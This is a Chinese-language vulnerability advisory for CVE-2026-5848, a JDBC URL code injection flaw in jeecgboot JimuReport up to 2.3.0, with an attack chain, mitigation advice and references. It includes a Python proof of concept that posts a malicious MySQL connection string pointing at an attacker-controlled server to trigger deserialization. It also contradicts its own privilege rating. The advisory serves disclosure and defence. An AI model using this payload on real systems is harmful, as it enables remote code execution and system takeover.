CVE-2026-5848 CVSS 4.7 中危

CVE-2026-5848 jeecgboot JimuReport代码注入漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5848

漏洞类型

代码注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

jeecgboot JimuReport

漏洞概述

Jeecgboot JimuReport 2.3.0及之前版本存在代码注入漏洞。该漏洞位于数据源处理组件的`/drag/onlDragDataSource/testConnection`接口中，由于对参数`dbUrl`缺乏严格过滤，攻击者可构造恶意数据库连接字符串，利用`DriverManager.getConnection`函数触发远程代码执行。目前该漏洞利用细节已公开，建议尽快修复。

技术细节

该漏洞的核心在于Jeecgboot JimuReport组件在测试数据源连接时，未对用户提交的`dbUrl`参数进行充分的安全校验与过滤，直接将其传递给底层Java的`DriverManager.getConnection`方法执行。攻击者利用JDBC连接字符串的特性，可以构造恶意的URL参数。例如，利用MySQL驱动的反序列化漏洞（通过`autoDeserialize`参数）或利用日志配置的远程类加载机制，当服务器尝试建立连接时，会解析并执行该恶意URL中包含的指令。由于漏洞点位于网络可达的接口，且无需高权限用户交互，攻击者可在服务器上下文中执行任意代码，导致系统被完全控制。

攻击链分析

STEP 1

侦察

攻击者识别出目标服务器正在运行Jeecgboot JimuReport，且版本低于等于2.3.0。

STEP 2

构造Payload

攻击者构造包含恶意JDBC URL参数的POST请求数据，旨在触发数据库驱动中的反序列化或代码执行机制。

STEP 3

发送请求

攻击者向`/drag/onlDragDataSource/testConnection`接口发送POST请求，注入恶意的`dbUrl`参数。

STEP 4

代码执行

服务器端接收请求，调用`DriverManager.getConnection`处理恶意URL，导致反序列化过程被触发，执行任意代码。

STEP 5

建立控制

攻击者获取服务器Shell权限，进而控制整个系统或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-host:port/drag/onlDragDataSource/testConnection"

# Malicious payload demonstrating the injection via dbUrl
# This is a conceptual example using a MySQL JDBC deserialization vector
payload = {
    "dbUrl": "jdbc:mysql://attacker-controlled-server:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
    "dbDriver": "com.mysql.cj.jdbc.Driver",
    "username": "root",
    "password": "password"
}

try:
    response = requests.post(url, data=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully, check server for code execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

jeecgboot JimuReport <= 2.3.0

防御指南

临时缓解措施

建议立即通过访问控制策略限制对`/drag/onlDragDataSource/testConnection`接口的外部访问，并在未完成升级前，禁用数据源在线测试功能以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5848
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5848
3 Details https://www.cvedetails.com/cve/CVE-2026-5848/
4 VulDB https://vuldb.com/cve/CVE-2026-5848
5 Link https://github.com/jeecgboot/jimureport/
6 Link https://github.com/jeecgboot/jimureport/issues/4587
7 Link https://github.com/jeecgboot/jimureport/issues/4587#issuecomment-4152596778
8 Link https://vuldb.com/submit/790769
9 Link https://vuldb.com/vuln/356374
10 Link https://vuldb.com/vuln/356374/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表